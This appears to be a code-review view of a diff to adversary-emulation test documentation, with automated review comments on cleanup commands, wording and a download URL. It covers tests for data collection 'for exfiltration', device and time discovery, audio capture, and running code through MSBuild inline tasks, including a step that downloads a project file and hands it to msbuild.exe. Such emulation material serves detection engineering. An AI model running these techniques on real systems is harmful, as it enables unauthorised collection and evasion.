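Review bot: the cleanup command visible in this hunk's header, `del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1`, redirects to `null` rather than the `nul` device, so it creates a stray file named `null` in the working directory on every run (the clipboard test earlier in this diff uses `>nul 2>&1` correctly). In addition, `del` on a directory name removes the files inside but leaves the directory itself, so the cleanup should use `rmdir /s /q %temp%\T1119_command_prompt_collection` if the intent is to remove the folder the description tells the reader to inspect.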
@@ -83,14 +87,16 @@ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | O
<br/>
## Atomic Test #3 - Recon information for export with PowerShell
auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** c3f6d794-50dd-482f-b640-0384fbb7db26
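Review bot: the cleanup shown in this hunk's header, `Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore`, targets a directory that the previous test populates with collected files; without `-Recurse`, Remove-Item prompts for confirmation on a non-empty directory, and `-Force` does not suppress that prompt, so the cleanup can hang in a non-interactive run. Add `-Recurse`. The description "collect information for exfiltration." should also start with a capital letter.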
@@ -118,14 +124,16 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
<br/>
## Atomic Test #4 - Recon information for export with Command Prompt
auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** aa1180e2-f329-4e1e-8625-2472ec0bfaf3
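Review bot: the description "collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt" duplicates Test #3 and starts in lower case; it should begin with a capital and say that this variant uses Command Prompt built-ins rather than PowerShell, since that is the only difference between the two tests and the thing a detection engineer needs to know.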
+5 -3
View File
@@ -10,13 +10,15 @@
<br/>
## Atomic Test #1 - Win32_PnPEntity Hardware Inventory
auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5
Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity
**Supported Platforms:** Windows
**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5
+5 -3
View File
@@ -12,13 +12,15 @@ Malware or scripts may be used to interact with the devices through an available
<br/>
## Atomic Test #1 - using device audio capture commandlet
auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)
**Supported Platforms:** Windows
**auto_generated_guid:** 9c3ad250-b185-4444-b5a9-d69218a10c95
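Review bot: the description consists solely of the link "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)" and does not say what the test does or what artifact it produces. Add a sentence such as "Uses the AudioDeviceCmdlets PowerShell module to record from the default audio input device" and state where the recording is written, following the pattern of the other tests in this diff. The title should also read "Using device audio capture cmdlet" (capitalised, and "cmdlet" rather than "commandlet").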
+10 -6
View File
@@ -16,13 +16,15 @@ This information could be useful for performing other techniques, such as execut
<br/>
## Atomic Test #1 - System Time Discovery
auto_generated_guid: 20aba24b-e61f-4b26-b4ce-4784f763ca20
Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 20aba24b-e61f-4b26-b4ce-4784f763ca20
#### Inputs:
@@ -48,13 +50,15 @@ w32tm /tz
<br/>
## Atomic Test #2 - System Time Discovery - PowerShell
auto_generated_guid: 1d5711d6-655c-4a47-ae9c-6503c74fa877
Identify the system time via PowerShell. Upon execution, the system time will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** 1d5711d6-655c-4a47-ae9c-6503c74fa877
+10 -6
View File
@@ -14,13 +14,15 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
<br/>
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#)
auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93
Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** 58742c0f-cb01-44cd-a60b-fb26e8871c93
#### Inputs:
@@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
<br/>
## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB)
auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359
Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** ab042179-c0c5-402f-9bc8-42741f5ce359
#### Inputs:
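Review bot: the prerequisite download visible in the preceding hunk header, `Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato...`, fetches the project file from the moving `master` branch, so the content executed by msbuild.exe can change without any change to this test. Pinning the URL to a specific commit, and verifying a hash of the downloaded file before it is handed to MSBuild, would make the test reproducible and protect users of the repository from a tampered project file.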

Some files were not shown because too many files have changed in this diff.